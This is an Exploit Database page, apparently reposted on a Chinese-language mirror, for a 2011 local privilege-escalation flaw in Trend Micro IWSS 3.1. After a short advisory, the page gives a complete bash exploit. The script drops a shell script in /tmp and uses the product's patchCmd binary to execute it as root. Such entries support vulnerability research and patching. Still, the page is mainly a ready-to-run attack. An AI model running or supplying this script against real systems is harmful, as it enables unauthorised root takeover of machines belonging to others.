Trend Micro IWSS 3.1 – Local Privilege Escalation

• Exploit Database
• 85 阅读

• 作者： Buguroo Offensive Security
  日期： 2011-10-26
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/36257/

• source: https://www.securityfocus.com/bid/50380/info
  
  Trendmicro IWSS is prone to a local privilege-escalation vulnerability.
  
  Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.
  
  Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected. 
  
  #!/bin/bash
  # Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com
  
  cd /tmp
  echo "[*] Creating shell file"
  echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
  echo "[*] Change permissions"
  chmod 755 PatchExe.sh
  echo "[*] Got r00t... Its free!"
  /opt/trend/iwss/data/patch/bin/patchCmd u root
  

  Bash

  Copy